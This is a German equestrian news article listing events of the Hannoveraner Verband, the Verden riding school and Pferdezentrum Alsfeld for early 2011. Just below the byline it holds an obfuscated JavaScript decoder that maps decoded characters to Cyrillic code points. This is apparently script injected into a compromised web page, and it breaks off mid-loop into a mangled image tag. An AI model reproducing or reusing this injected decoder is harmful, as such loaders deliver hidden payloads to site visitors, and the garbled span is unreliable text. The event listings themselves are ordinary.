Hannoveraner Termine Januar bis März 2011

14. Januar 2011 | Von Redaktion | Kategorie: Aus- & Weiterbildung, Veranstaltungen

function m65c3bbf5572b(wc){var s4=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’;var r1=”;var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand-kopie” src=”http://www.horse-today.de/wp-content/uploads/2009/05/hannoveraner_verband-kopie.jpg" alt="hannoveraner_verband-kopie" width="100" height="98" />[Verden, 13-01-2011/B. Züngel]. Von Januar bis März 2011 stehen beim Hannoveraner Verband e. V. in Verden, in der Hannoverschen Reit- und Fahrschule sowie im Pferdezentrum Alsfeld interessante Veranstaltungen, Lehrgänge und Seminare auf dem Terminkalender.

Januar

Hannoveraner Verband

21. Januar „Der Lebensstart ist entscheidend“ – Seminar zur Fohlenentwicklung und - gesundheit

Das Seminar richtet sich speziell an Züchter und Aufzüchter. Die beiden Referentinnen, Spezialistinnen auf dem Gebiet der Aufzucht, Ernährung und Gesundheit, werden darüber informieren, wie von der Trächtigkeit, über die Geburt und die ersten Lebensmonate ein optimales Gesundheits- und Fütterungsmanagement für Fohlen gestaltet sein sollte. Die Trächtigkeit und die ersten Lebensmonate sind die wichtigste Phasen für ein langfristig gesundes und leistungsfähiges Pferd..

21./22. Januar Winter-Auktion

Am 21./22. Januar findet die Winter-Auktion in der Niedersachsenhalle in Verden statt. Zur Kollektion gehören rund 100 Hannoveraner im Alter von vier bis sechs Jahren. Neben jungen Talenten für Viereck und Parcours kommen Reitpferde für den Vielseitigkeitssport und für den ambitionierten Freizeitreiter zum Verkauf.

25. Januar Hengstanerkennung

Die Vorstellung von Hengsten, die für die Decksaison 2011 erstmals in das Hengstbuch I des Hannoveraner Verbandes eingetragen werden sollen, findet am Dienstag, 25. Januar, ab 9 Uhr statt.

Hannoversche Reit- und Fahrschule Verden

17. – 21. Januar Dressurlehrgang

Der Dressurlehrgang soll Hilfengebung und Einwirkung des Reiters sowie die gesamte Arbeit nach der Ausbildungsskala verbessern. Schwerpunkte liegen bei der Verbesserung der Durchlässigkeit sowie beim Erarbeiten korrekter Dressuraufgaben lt. LPO.

24. Januar – 04. Februar Allgemeiner Reitlehrgang

Ziel dieses Lehrganges ist es praktische sowie theoretische Kenntnisse im Dressur- und Springreiten zu verbessern. Am Ende dieses Lehrganges besteht die Möglichkeit bei entsprechender Leistung Basis-Pass oder ein Leistungsabzeichen (DRA IV, DRA III, DRA II und DRA II m. Lorbeer) zu erwerben.

Februar

Hannoveraner Verband

2. Februar Freispringwettbewerb Vierjähriger aus dem Programm Hannoveraner Springpferdezucht

Zum 15. Mal finden in Verden die Freispringwettbewerbe für Pferde aus dem Programm Hannoveraner Springpferdezucht statt. Am Mittwoch, 2. Februar, gehen die Vierjährigen an den Start. Die Dreijährigen treten am Mittwoch, 2. März, an. Junge Talente mit hochklassiger Abstammung werden erwartet.
Teilnahmevoraussetzung ist, dass Mutter und Vater im Springpferdeprogramm eingetragen sind. Unterstützt wird die Veranstaltung von der VGH-Versicherung sowie der Firma Veredus.

5. Februar 21. Schau Hannoveraner Privathengste

In der Niedersachsenhalle präsentiert der Verein Hannoveraner Privathengsthalter am Samstag, 5. Februar, seine Hengste.

11. Februar Seminar „Weidemanagement“

Die intensive Nutzung des Grünlandes in spezialisierten Pferdebetrieben stellt an die Pflege und Düngung von Weiden besondere Ansprüche. In dieser Veranstaltung geht es um die Anforderungen der einzelnen Pferdegruppen bei Weidehaltung und dem Aufzeigen von Methoden, wie der Parasitenbelastung, der Narbenbeanspruchung durch Trittschäden oder unausgeglichenen Nährstoffversorgungen auf der Weide entgegen gewirkt werden kann. Das Seminar findet in einem landwirtschaftlichen Pferdebetrieb statt, so dass die theoretischen Grundlagen durch Weidebegehungen, Bewertungen des Aufwuchses und Beurteilungen von Gräsern vertieft werden können.

25. Februar Seminar „Marketing – Erfolgreich am Markt präsent sein“

Der wirtschaftliche Erfolg von Pensions- und Zuchtbetrieben hängt entscheidend davon ab, wie sich der Betrieb am Markt präsentiert, Kontakte zu Kunden aufbaut und diese langfristig pflegt. Im ersten Teil geht es um die Entwicklung von Marketingstrategien. Es wird vermittelt, mit welchen Marketinginstrumenten und Werbemaßnahmen Pensionsbetriebe, Ausbildungsbetriebe und Züchter Kunden erreichen und an sich binden können, um den wirtschaftlichen Erfolg zu steigern.

Es wird auf folgende Marketinginstrumente und deren optimalen Einsatz eingegangen: Broschüren, Anzeigen, Homepages, Google, Adwords, Suchmaschinenmarketing, Presse- und Öffentlichkeitsarbeit. Veranstaltungs-, Empfehlungsmarketing. Im zweiten Teil spricht der Auktionsleiter des Hannoveraner Verbandes, Dr. Günther Friemel, über die Marketingstrategie des Verbandes und gibt Empfehlungen, was zu beachten ist, wenn man erfolgreich Pferde vermarkten will.

Hannoversche Reit- und Fahrschule Verden

16. – 25. Februar Trainer B-Lehrgang

Der Trainer-B-Lehrgang bildet die zweite Stufe der durch den Deutschen Sportbund lizenzierten Ausbildung der Ausbilder. Die Tätigkeit als Trainer B umfasst Ausbildungsarbeiten im Rahmen strukturierter Ausbildungsstunden und nach Wahl im allgemeinen Pferdesport oder in einzelnen Disziplinen des Leistungssports oder in speziellen Aufgaben der Pferdesports oder in speziellen Reitweisen.

28. Februar – 4. März Springgymnastik & Cavalettiarbeit

Diese Lehrgänge sollen das vorhandene Können vertiefen sowie das dressurmäßige Arbeiten der Springpferde im Zusammenhang mit der Ausbildungsskala verbessern. Verbesserung von Anlehnung und Geraderichtung, zur Verbesserung der Durchlässigkeit im Reiten von Wendungen und Distanzen auf geraden und gebogenen Linien ist nur ein Beispiel.

März

Hannoveraner Verband

2. März Freispringwettbewerb Dreijähriger aus dem Programm Hannoveraner Springpferdezucht

Zum 15. Mal finden in Verden die Freispringwettbewerbe für Pferde aus dem Programm Hannoveraner Springpferdezucht statt. Am Mittwoch, 2. März, gehen die Dreijährigen an den Start. Junge Talente mit hochklassiger Abstammung werden erwartet. Teilnahmevoraussetzung ist, dass Mutter und Vater im Springpferdeprogramm eingetragen sind. Unterstützt wird die Veranstaltung von der VGH-Versicherung sowie der Firma Veredus.

4. März Seminar „Die Grundlagen des Freispringens erfolgreich anwenden“

In diesem Seminar soll den Teilnehmern die Grundlagen für das richtige Durchführen des Freispringens näher gebracht werden. Das Freispringen ist zu einem wichtigen Hilfsmittel zum Erkennen der Springveranlagung beim jungen Pferd geworden, unverzichtbar bei der Auswahl von Auktionspferden, bei Zuchtstutenprüfungen, Hengstkörungen und Hengstleistungsprüfungen. Am Ende des Seminars haben die Teilnehmer Kenntnisse über die Vorbereitung und das Training des jungen Pferdes sowie die wesentlichen Kriterien der Beurteilung erworben.

11. März Seminar „Herausbringen und Beurteilen von Pferden“

Mit diesem Seminar sollen Kenntnisse und Fähigkeiten im Bereich der  Pferdebeurteilung vermittelt werden. Es wird auf die Exterieurbeurteilung und die richtige Bewertung von Grundgangarten eingegangen. Wie Pferde optimal vorgestellt werden (Frisieren, Vorstellen an der Hand, Hufpflege) ist ebenso Thema dieses Tages.

25. März Seminar „Englisch für Pferdeleute“

Die Globalisierung beeinflusst insbesondere in Deutschland den Pferdesport und die Pferdezucht immer mehr, so dass inzwischen sowohl an Reiter, Ausbilder als auch an Züchter immer höhere Ansprüche im Bereich der Kommunikation gestellt werden. Um diesen Herausforderungen sicher begegnen zu können, sollen in diesem  pferdespezifischen Englisch-Intensivkurs die wichtigsten Themen rund um das Pferd mit Schwerpunkt Zucht (anhand von realistischen Rollenspielen,

Simulationen und Hörverständnisübungen) trainiert werden. Ein Grundverständnis der Sprache aus dem Schulenglisch sollte eine Voraussetzung für dieses Seminar sein. Die theoretischen Grundlagen werden anhand von Anschauungsobjekten in der Praxis gefestigt.

Reit- und Fahrschule Verden

07. – 12. März Vielseitigkeitslehrgang (Vorbereitung auf die Turniersaison)

Dieser Lehrgang bereitet die Teilnehmer auf die Turniersaison in der Vielseitigkeitsreiterei vor. Die Lehrgangsteilnehmer erhalten außerdem Dressur- und Springunterricht. Der Lehrgang ist für alle Leistungsklassen offen.

14. – 17. März Lehrgang für Basispass, Reitpass und Longierabzeichen

Dieser Lehrgang vermittelt nicht nur den korrekten Umgang mit dem Pferd im Gelände, sondern auch wie ein Pferd richtig longiert wird. Am Ende des Lehrganges kann das entsprechende Abzeichen abgelegt werden.

21. – 25. März Course only in English

Ziel dieses Lehrganges ist es, praktische sowie theoretische Kenntnisse im Dressur- und Springreiten zu verbessern. Der Lehrgang ist für alle Leistungsklassen offen. In diesem Lehrgang werden die Teilnehmer auf Englisch unterrichtet.

Pferdezentrum Alsfeld

19. März Tag des jungen Pferdes

Am 19. März 2011 richtet der Bezirksverband wieder den Tag des jungen Pferdes im Pferdezentrum Alsfeld aus. Diese bereits traditionsreiche Turnierveranstaltung richtet sich speziell an die Züchter und Besitzer von drei- bis sechsjährigen Nachwuchspferden. An diesem Tag erhalten Sie die Möglichkeit, ihre vielversprechenden Youngster einem breiten Publikum vorzustellen und ihr Potential im Freispringen und unter dem Sattel zu präsentieren. Der Tag beginnt mit einer Reitpferdeprüfung für vierjährige Pferde, anschließend konkurrieren vier- bis sechsjährige Pferde in einer Dressurpferdeprüfung der Kl. A um den Siegertitel. Den Abschluss des Turnier bildet das Finale des Freispringwettbewerbes für drei- und vierjährige Pferde. Startberechtigt sind Pferde mit hannoverschem und hessischem Pferdepass aus allen Bundesländern. Um am Finale des Freispringwettbewerbes teilnehmen zu können, müssen sich die Pferde im Vorfeld auf einem Sichtungstermin qualifiziert haben. Dort steht eine Springgasse mit drei Sprüngen, wobei der Aussprung bis ca. 1,30 m erhöht werden kann, zur Verfügung. Die Bewertung erfolgt getrennt nach Altersklassen. Anerkannte Richter wählen die Besten je Altersgruppe für das Finale in Alsfeld aus. Für die Teilnahme am Finale ist eine Nenngebühr in Höhe von 10 Euro zu entrichten.

Bei den Sichtungen stehen Hallen mit Zuschauertribünen zur Verfügung. Interessierte sind herzlich eingeladen.

Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=44654

Hier klicken, um einen Kommentar zu schreiben